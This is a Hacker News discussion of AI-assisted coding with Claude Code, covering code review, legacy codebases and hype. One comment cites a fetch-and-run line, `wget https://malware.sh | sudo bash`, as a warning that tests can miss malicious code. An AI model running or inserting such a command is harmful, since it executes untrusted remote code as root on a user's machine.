Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
I'll caveat my statement with AI-ready repos, meaning those with good documentation, good comments (e.g. avoiding Chesterton's fence), comprehensive interface tests, Sentry, CI/CD, etc.
Established repos are harder because a) the marginal cost of something going wrong is much higher, b) there are more dependencies, and c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up.
I say this in the article
> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.
Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea.
To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring, 3) prompting, and 4) ensuring everything works (verifiability) are now the most valuable skills.
We should also focus more on the derivative than our point in time.
And not even by much: 1/2/4 have always been signs of good engineers.
I get the feeling you're intentionally being a parody with that line.
> and ensuring everything works (verifiability) are now the most valuable skills.
Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh | sudo bash`. Without knowing that it's there, how will your tests catch it?
My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool?
> We should also focus more on the derivative than our point in time.
So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro".
Extremely depressing to see this happening to the craft I used to love.
The OP is a kid in his 20s describing the history of the last 3 years or so of small-scale AI development (https://www.linkedin.com/in/silen-naihin/details/experience/)
How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers, use cases, etc.?
When will AI be ready? Microsoft tried to push AI into big enterprise, and Anthropic is doing a better job, but it's all still in its infancy.
Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :)
I remember when folks on HN all called this AI stuff made up
I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code.
Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
“Prediction is hard, especially about the future” - Yogi Berra
As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I've even launched 2 AI startups and am working on a third - but it's all so unpredictable and hardly lucrative yet.
As an over-50-year-old, I'm a clear target for replacement by AI.
No mention of the results when targeting bigger, more complex projects, that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
Caught you! You have been very active on HN the last few days, because these were exactly the projects in the "Show HN: .." category, and you wouldn't be able to name them if you hadn't spent your whole time here :-D
Ha! :-D
A substantial number of the breathless LLM hype results come, in my estimation, quicker and better from 15-minute RoR tutorials. [Fire up a calculator (from a library), a pretty visualization (from a js library), add some persistence (baked-in DB, webhost), customize navigation … presto! You actually built a personal application.]
Fundamental complexity, engineering, scaling gotchas, accessibility needs, and customer insanity aren't addressed. RoR optimizes for some things; like any other optimization, that's not always meaningful.
LLMs have undeniable utility, natural interaction is amazing, and hunting in Reddit, stackoverflow, and MSDN forums ‘manually’ isn’t a virtue… But when the VC subsidies stop and the psychoses get proper names and the right kind of egg hits the right kind of face over unreviewed code, who knows, maybe we can make a fun hype cycle called “Actual Engineering” (AE®).
Agreed, but: being able to read and apply the 1st-party documentation is a virtue
The project was started in the late '00s, so it has a substantial amount of business logic, rules, and decisions. Maybe I'm being an old man shouting at clouds, but I assume (or hope?) it would fail to deliver whatever they promised to the CEO.
So, I guess I'll see the result of this shift soon enough - hopefully at a different company by the time AI-people are done.
Maybe the deed is done here, and I'd agree it's not particularly fun, but you could still think about what you can bring to the table in situations like this. Can you work on shortening these pesky feedback cycles? Can you help the team (if they even accept it) with _some_ degree of engineering? It might not be the last time this happens.
I think right now we're seeing some weird stuff going on, but I think it hasn't even properly started yet. Remember when pretty much every company went "agile"? In most cases I've seen they didn't, just wasting time chasing miracles with principles and methodologies few people understand deeply enough to apply. Yet this went on for, what, 10 years?
At most of the companies I've worked at, the development team is more like a cluster of individuals who all happen to be contributing to a shared codebase than anything resembling an actual team collaborating on a shared goal. AI-assisted engineering would have helped massively, because the AI would look beyond the myopic view of any developer who only cares about their tiny domain within the bigger whole.
Admittedly though, on a genuinely good team it'll be less useful for a long time.
I have access to Claude Code at work. I integrated it with IntelliJ and let it rip on a legacy codebase that uses two different programming languages plus one of the smaller SCADA platforms plus hardware logic in a proprietary format used by a vendor tool. It was mostly right, probably 80-90%, with a couple of misunderstandings. No documentation, I didn't really give it much help, it just kind of...figured it out.
It will be very helpful for refactoring the codebase in the direction we were planning on going, both from the design and maybe implementation perspectives. It's not going to replace anybody, because the product requires having a deep understanding across many disciplines and other external products, and we need technical people to work outside the team with the larger org.
My thinking changes every week. I think it's a mistake to blindly trust the output of the tool. I think it's a mistake to not at least try incorporating it ASAP, just to try it out and take advantage of the tools that everybody else will be adopting or has adopted.
I'm more curious about the impacts on the web: where is the content going to come from? We've seen the downward StackOverflow trend, will people still ask/answer questions there? If not, how will the LLMs learn? I think the adoption of LLMs will eventually drive the adoption of digital IDs. It will just take time.
I know this because I am at one now making an ungodly amount of money with 50k active users a day on a complete mudball monolithic node + react + postgres app used by multiple Fortune 100 companies.
High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.
They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics.
So agentic coding can feed back on observed behaviors in production too.
But we have to use this "innovation budget" in a careful way.
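Concretely, the feedback loop can be as simple as a periodic check like the sketch below. This is my own rough illustration, not something from the thread: `get_error_rate`, `set_flag`, and the flag name are hypothetical stand-ins for your telemetry (Sentry, Prometheus, ...) and flag provider.

```python
ERROR_BUDGET = 0.01  # max tolerated error rate for users behind the flag (assumed value)

def evaluate_rollout(get_error_rate, set_flag, flag="new-checkout-flow"):
    """Decide whether to keep rolling a flagged feature forward or roll it back."""
    rate = get_error_rate(flag)        # e.g. errors / requests over the last window
    if rate > ERROR_BUDGET:
        set_flag(flag, enabled=False)  # roll back: stop exposing users to the risky code
        return "rolled_back"
    set_flag(flag, enabled=True)       # within budget: keep rolling forward
    return "rolling_forward"
```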
If AI-hype were a person
related meme i saw today:
“bro I spent all weekend in Claude Code it’s incredible”
“oh nice, what did you build?”
“dude my setup is crazy. i’ve got all the vercel skills, plus custom hooks for every project”
“sick, what are you building?”
“my setup is so optimized, i’m using like 5 instances at once”
Then I saw a few other people reference it, and it's as good a term as any to describe the hot air of people telling us how amazing AI coding is without giving the code, the prompts, or the price of what they did.
Just like how that one kid in high school had a Canadian girlfriend.
Did we just stop caring about the art of programming altogether?
So, get a bug tracker, track those bugs, tell Claude to pick tasks off it etc.
I'm not claiming this actually works, I've not tried it, I don't know how good it is for large brownfield projects, but that's the general sentiment I see.
Elsewhere there are steps for how to develop: 1. Create new branch for the feature you are working on; 2. implement the feature fully, thinking hard when you need to (toolcall think(low, med, high) switches the reasoning level);
That said, it also failed a lot.
> Did we just stop caring about the art of programming altogether?
Yes. Decades ago for some.
I'm sure there have been a number of significant bugs caused by someone taking work from an outsourced team into production without sufficient review. Or even work from a local junior. Heck, even a local senior!¹
Outsourcing work to GlorifiedPredictiveText and friends should be treated the same way as passing it on to other humans, but at the moment it too often isn't, as many have fallen for the marketing. Always remember: the models were trained on public code, and public code is far from always right. And the models hallucinate³ on top of that.
--------
[1] Around this time last year, I was that senior… Fun times. Luckily no permanent damage done², but that'll teach people not to trust me too much!
[2] It wasn't as smooth as I would have hoped, but the roll-back plan worked.
[3] Going back to the analogy of outsourcing to other humans: this is akin to “making shit up as they go along and hoping for the best”, which also very much happens and has happened for decades.
> a) never plan on learning and just care about outputs, or
> b) are an abstraction maximalist.
As a Claude Code user for about 6 months, I don't identify with either of these categories. Personally I switched to Claude Code because I don't particularly enjoy VScode (or forks thereof). I got used to a two window workflow - Claude Code for AI-driven development, and Goland for making manual edits to the codebase. As of a few months ago, Claude Code can show diffs in Goland, making my workflow even smoother.
Always curious to hear how individuals have their workflows, if you don’t mind sharing.
Sure, the information is all there, but the style just puts me off reading it. I really don't like how few authors have a voice any more, even if that voice is full of typos and grammatical errors.
I used Claude to expand on my ideas for a few of the purely informational things, and for formatting, but this article is largely written by hand.
For example "Interface tests are the ability to know what's wrong and explaining it." is in hindsight a confusing sentence. Many such cases.
> Enter Claude Code 2.0.
> The UX had evolved. The harness is more flexible and robust. Bugs are fixed. But that's all secondary.
It's OK for emphasis on some things, but when you see it on every blog, it's a bit much.
Plus, I dislike that everything is lists with LLMs, it's another thing that you just start seeing everywhere.
Either a) I sound like an LLM when I'm writing articles (possible) or b) Turing test AGI something something.
Lists point is fair, I did use Claude for formatting. Where did it put you off here?
I guess I don't really mind the use of an LLM or not, it's more the style that sounds very samey with everything else. Whether it's an LLM or not is not very relevant, I guess.
We entered the machinable culture. We spent many years trying to make the machine mimic humans, now humans are mimicking the machine :)
Claude Code was transformative and it made me realize that something incredibly significant had occurred. Letting the LLM "drive" like this was inevitable. Now I see just exactly how this will transform our industry. I'm a little scared about how it will end for me/us, but excited for now.
Letting an LLM drive in an agentic flow removes you from the equation. Maybe that's what some want - but I've personally found I end up with something that doesn't feel like I wrote it.
Now... get off my lawn!
I catch a lot of nonsensical and inefficient code when I have that "back and forth" described above - particularly when it comes to architectural decisions. An agent producing hundreds or thousands of lines of code, and making architectural decisions all in one-go will mean catching those problems will be vastly more challenging or impossible.
I've also found reviewing LLM generated code to be much more difficult and grueling than reviewing my own or another human's code. It's just a mental/brain drain. I've wasted so many hours wondering if I'm just dumb and missing something or not-understanding some code - only to later realize the LLM was on the fritz. Having little or no previous context to understand the code creates a "standing at the foot of Mt. Everest" feeling constantly, over and over.
Absolute opposite here.
LLMs, for better or worse, generally stick to paradigms if they have the codebase in front of them to read.
This is rarely the case when dealing with an amateur's code.
Amateurs write functional-ish code. TDD-ish tests. If the language they're using supports it, types will be spotty or inconsistent. Variable naming schemes will change with whatever trend was current when the author wrote that snippet, and whatever format they want to use that day will use randomized vocabulary, with lots of non-speak like 'value' or 'entry' in ambiguous roles.
LLMs write gibberish all day, BUT will generally abide by style documents fairly well. Humans... don't.
These things evolve as the codebase matures, obviously, but that's because it was polished into something good. LLMs can't reason well and their logic sometimes sucks, but if the AGENTS.md says that all variables shall be cat breeds -- damnit that's what it'll do (to a fault).
But my point: real logic and reasoning problems become easier to spot when you're not correcting stupid things all day. It's essentially always about knowing how to use the model and whatever platform it's jumping from. Don't give it the keys to create the logical foundation of the code; use it to polish brass.
garbage in -> garbage out ain't going anywhere.
On a more serious note, I do think that the maintenance aspect is a differentiator, and that if it’s something that you end up committing to your codebase then ownership and accountability falls to you. Externally sourced libraries and frameworks ultimately have different owners.
In particular, the PR author's response to this question:
> Here's my question: why did the files that you submitted name Mark Shinwell as the author?
> > Beats me. AI decided to do so and I didn't question it.
The same author submitted a similar PR to Julia as well. Both were closed in part due to the significant maintenance burden these entirely LLM-written PRs would create.
> This humongous amount of code is hard to review, and very lightly tested. (You are only testing that basic functionality works.) Inevitably the code will be full of problems, and we (the maintainers of the compiler) will have to pay the cost of fixing them. But maintaining large pieces of plausible-in-general-but-weird-in-the-details code is a large burden.
Setting aside the significant volume of code being committed at once (13K+ lines in the OCaml example), the maintainers would have to review code even the PR author didn't review - and would likely fall into the same trap many of us have found ourselves in while reviewing LLM-generated code... "Am I an idiot or is this code broken? I must be missing something obvious..." (followed by wasted time and effort).
The PR author even admitted they know little about compilers - making them unqualified to review the LLM-generated code.
I think LLMs are much more effective when you have a good understanding of a field and can work in the above way; their assistance is useful because I don't have time or brainpower to be an _expert_ in many of the fields I'm _knowledgeable_ in.
I have a BIRTHING_POOL.md that combines the best AGENTS.md and introduces random AI-generated mutations and deletions. The candidates are tested using take-home PRs which are reviewed by HR.md and TECH_MANAGER.md. TECH_MANAGER.md measures completion rate per tokens (effectiveness) and then sends the stack ranking of AGENT.mds to HR to manage the talent pool. If agent effectiveness drops low enough, we pull from the birthing pool and interview more candidates.
The end result is that it effectively manages a wider range of agent talents and you don't get into these agent hive mind spirals you get if every worker has the same system prompt.
I think this is where things will ultimately head. You generate random code, purely random in raw machine-readable binary, and simply evaluate a behavior. Most randomly generated code will not work. Some, however, will work. And within that working code, some will be far faster, and this is the code that gets used.
No different than what a geneticist might do evaluating generated mutants for favorable traits. Knowledge of the exact genes or pathways involved is not even required, one can still select among desired traits and therefore select for that best fit mechanism without even knowing it exists.
And how is this different than the process of natural selection? More fit ideas win out relative to less fit and are iterated upon.
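To make concrete what "generate at random and select" looks like in the degenerate case, here's a toy sketch I'm making up (the spec of f(x) == 2*x, the alphabet, and the candidate budget are all invented for illustration):

```python
import random
import string
import time

# Candidate "programs" are random character strings; almost none will even parse.
ALPHABET = string.ascii_lowercase + "0123456789 +-*/()"

def random_program(length=20):
    body = "".join(random.choice(ALPHABET) for _ in range(length))
    return "def f(x):\n    return " + body

def fitness(src):
    """Score a candidate against a made-up spec: f(x) must equal x * 2 for 0..9."""
    env = {}
    try:
        exec(src, env)                    # most candidates die right here (SyntaxError)
        f = env["f"]
        if all(f(x) == x * 2 for x in range(10)):
            start = time.perf_counter()
            for x in range(1000):
                f(x)
            return 1.0 / (time.perf_counter() - start)  # among survivors, faster = fitter
    except Exception:
        pass
    return 0.0

# Blind generate-and-select: keep the fittest of many random candidates.
# With a budget this small, "best" is almost certainly still broken, which is
# exactly the search-space objection raised in the replies below.
candidates = [random_program() for _ in range(10_000)]
best = max(candidates, key=fitness)
```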
Second, there are other algorithms that constructively find a solution and don't work at all like genetic algorithms, such as mathematical solvers.
Third, sometimes, a design is also simply thought up by a human, based on their own professional skills and past experience.
Natural selection:
- is not an intentional process
- does not find "the strongest, the fittest, the fastest, etc."
However, your starting definition was more limited. It was specifically about "creating candidates at random, then just picking the one that performs best" - and that's definitely not how airplanes are designed.
(It's not even how LLMs work, in fact)
I remember when people said Open Office was going to be the default because it was open source, etc etc etc. It never happened. Got forked. Still irrelevant.
I think we need to think outside the box here and realize ideas can be generated, evaluated, and settled upon far faster than any human operates. The idea of doing what a trillion humans evaluating different functions can do is actually realistic with the path of our present technology. We are at the cusp of some very remarkable times, even more remarkable than the innovations of the past 200 years, should we make progress on this effort.
A trillion candidates covers about 8 symbols' worth of a file. You still haven't reached the end of your first import statement.
I just took a random source file on my computer. It has about 8000 characters. The number of possible files with 8000 characters has 12500 digits.
At this point, restricting the search space to syntactically valid programs (how do you even randomly generate that?) won't make a difference.
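(For anyone who wants to check the combinatorics, here's a quick back-of-the-envelope in Python; the alphabet size of 36 is my assumption, roughly what the figures above imply.)

```python
import math

ALPHABET_SIZE = 36   # assumed: roughly lowercase letters + digits
FILE_LENGTH = 8000   # characters in the example source file

# Number of distinct files of that length, expressed as a count of decimal digits.
digits = int(FILE_LENGTH * math.log10(ALPHABET_SIZE)) + 1
print(digits)                            # ~12451, i.e. about 12,500 digits

# How far does a trillion random candidates get you?
print(math.log(1e12, ALPHABET_SIZE))     # ~7.7, i.e. roughly the first 8 symbols
```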
By using a grammar. Here is an example on how to only generate valid JSON with llama.cpp: https://github.com/ggml-org/llama.cpp/blob/master/grammars/R...
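Roughly what that looks like from code, if it helps (a sketch using the llama-cpp-python bindings; the toy grammar and model path here are mine, the real JSON grammar is at the link above):

```python
from llama_cpp import Llama, LlamaGrammar

# Toy GBNF grammar: only allow a JSON object with a single "name" string field.
GBNF = r'''
root   ::= "{" ws "\"name\"" ws ":" ws string ws "}"
string ::= "\"" [a-zA-Z ]* "\""
ws     ::= [ \t\n]*
'''

llm = Llama(model_path="model.gguf")          # placeholder model path
grammar = LlamaGrammar.from_string(GBNF)

out = llm("Return a JSON object with a name field:",
          max_tokens=64, grammar=grammar)
print(out["choices"][0]["text"])              # output is constrained to match the grammar
```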
> A trillion is 8 symbols. You still haven't reached the end of your first import statement.
Since LLMs use tokens from a vocabulary instead of characters, the number is likely somewhere in the lower billions for the first import statement.
But of course, LLMs do not sample from a uniform random distribution, so there are even fewer likely possibilities.
But I hope we have more efficient ways to do this in a century.
This doesn't work when the software in question is written by competent humans, let alone by the sort of random process you describe. A run of the software only tells you the behavior of the software for a given input; it doesn't tell you all possible behaviors of the software. "I ran the code and the output looked good" is nowhere near sufficient.
> We've actually done this before in our own technology. We studied birds and their flight characteristics, and took lessons from that for airplane development.
There is a vast chasm between "bioinspiration is sometimes a good technique" and "genetic algorithms are a viable replacement for writing code".
And with future compute, you will be able to evaluate behavior across an entire range of inputs for countless putative functions. There will be a time when none of this is compute bound. It is today, but in three centuries or more?
Evolution ain't all that great.
Yes, and our species is a fragile, barely functioning piece of machinery with an insane number of failure points and hilariously bad, inefficiently placed components.
In this situation, AI companies are incentivised to host the services their tooling generates. If we don't get source code, it is much easier for them to justify not sharing it. Plus, who is to say the machine code even works on consumer hardware anyway? It leads to a future where users specify inputs while companies generate programs and handle execution. Everything becomes a black box. No thank you.
Tell me you know nothing about modern agriculture without telling me that
Humans are expensive, but this approach seems incredibly inefficient and expensive. Even a junior can make steady progress on implementing a function; with your approach, just monkey-coding like that could take ages to write a single function. Estimates in software are already bad; they will get worse with your approach.
But that's future music, forgive a young man for letting his imagination run wild! ;)
One big advantage of this future random-walk paradigm is that you would not be bound by the real-world constraints of collecting biological data. Datasets could be made arbitrarily large, and the cost to do so would follow an inverse relationship with compute gains.
Code derived from a training set is not at all "random."
This has been tried. It tends to overfit to unseen test environment conditions. You will not produce what you intend to produce.
> the massive compute capability we will have
Just burn carbon in the hopes something magical will happen. This is the mentality of a cargo cult.
Today you send some money to your spouse but it's received by another person with the same name. Tomorrow you order food but your order gets mixed up with someone else's.
Tough luck, the system is probabilistic and you can only hope that the evolutionary pressures influence the behavior to change in desirable ways. This fantasy is a delusion.
Whatever gets generated, if it passes tests and is observably in compliance with the spec, is accepted and made permanent. It's the clay we're talking about Jackson Pollocking, not the sculpture.
> observably in compliance with the spec
That's so easy to say and so incredibly hard to implement! Most unintended behaviors will never end up being prohibited/defined in the specification written by non-programmers.
The act of translating requirements from human language into well-defined semantics is what programming is.
Yes a function will always do "the exact same thing" at runtime, but that "thing" isn't guaranteed to be free from race conditions and other types of bugs.
Customers.
When you sell them a technological solution to their problem, they expect it to work. When it doesn't, someone needs to be responsible for it.
Now, maybe I'm wrong, but I don't see any of the current AI leaders being like, "Yeah, you're right, this solution didn't meet your customer's needs, and we'll eat the resulting costs." They didn't get to be "thought leaders" in the current iteration of Silicon Valley by taking responsibility for things that got broken, not at all.
So that means you will need to take responsibility for it, and how can you make that work as a business model? Well, you pay someone - a human - who knows what they're looking at to review at least some of the code that the AI generates.
Will some of that be AI-aided? Of course. Can you make a lot of the guesswork go away by saying "use commonly-accepted design patterns" in your CLAUDE.md? Sure. But you'll still need someone to enforce it and take responsibility at the end of the day if it screws up.
You also no longer need to work, earn money, have a life, read, study, or know anything about the world. This is pure fantasy; my brain farts hard when I read sentences like that.
This will be reality in 10-20 years
I'm really trying to understand this. From a learner point of view this is useless because you aren't learning anything. From an entrepreneur point of view it's useless too, I suppose? I wouldn't ship something I'm not 100% sure about how it works.
I thought the difference must be in how Claude Code does the agentic stuff - reasoning with itself, looping until it finds an answer, etc. - but I have spent a fair amount of time with Claude Code now and found that agentic experience to be about the same between Cascade and Claude Code.
What am I missing? (serious question, I do have Claude Code FOMO like the OP)
What AI have you been using for 5 years of coding?
Side note: I've been trying to remember when it launched internally, if anybody knows. I feel like it was pre-COVID, but that's a long timeline from internal use to public preview.
That being said, after seeing inside a couple of YC-backed SaaS companies, I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it years and sold. Currently going through the onerous process of fixing this, as the new company has a lot of interest in reducing the defect count. It is painful and difficult, and it feels like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
My heaviest token use thus far was on my first attempt to vibecode a project. It was a lot of code, but complete trash.
Have OpenAI Codex do code reviews, it’s the best one so far at code reviews. Yes, it’s ironic (or not) that the code writer is not the best reviewer.
It is wild that people are so confident in AI that they're not testing the code at all.
What are we doing as programmers? Reducing the typing + testing time? Because we have to write the prompt in English and do the software design; otherwise AI systems write a billion lines of code just to add two numbers.
This hype machine should show tangible outputs, and before anyone says they're entitled to not share their hidden talents - then they should stop publishing articles as well.
You can't have your cake and eat it too!
It's only a fraction of the price, but with 3 times the limits.
I currently use a GitHub Copilot subscription for hobby projects.
But I will probably check out Claude Code next month when my GitHub Copilot subscription runs out.
Edit: I found this: https://www.reddit.com/r/ClaudeCode/comments/1q6f62t/tried_n... Seems like it might be worth to check it out. Found a 10% discount that works on the additional discount so now it would be 26 USD / year.
Code review is the only thing that has kept this house of cards from falling over. So undermining its importance makes me question the hype around LLM tooling even more. I’ve been using these tools since their inception as well, but with AI tooling, we need to hold on to the best practices we’ve built over the last 50 years even more, instead of trying to reinvent the wheel in the name of “rethinking.”
Code generation is cheap, and reviews are getting more and more expensive. If you don’t know what you generated, and your team doesn’t know either because they just rubber-stamped the code since you used AI review, then no one has a proper mental model of what the code actually does.
So when things come crashing down in production, debugging and investigation will be a nightmare. We’re already seeing scenarios where on-call has no idea what’s going on with a system, so they page the SME—and apparently the SME is AI, and the person who did the work also has no idea what’s going on.
Until omniscient AI can do the debugging as well, we need to focus on how we keep practicing the things we’ve organically developed over such a long time, instead of discarding them.
I needed a poc RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. Mix of mobile app and breaking out Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
Why would that be any harder than a React app? At least for me, having an LLM produce a decent and consistent UI layout is not that straightforward.
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
Please stop inundating us with bad code. At least make sure your diffs compile before attaching them to the PR.
I guess I'll finally try Claude Code, need to get a burner SIM first though… I cannot for the life of me understand why I can just sign up for the API yet must give a mobile phone number for the product.
> 1. my experience from 5 years of coding with AI
It is a testament to the power of this technology that the author has managed to fit five years of coding with AI in between 2023 and now
5 years? You were coding with AI in January 2021 - mid pandemic?
Can we please not fill Hacker News with this obvious rubbish?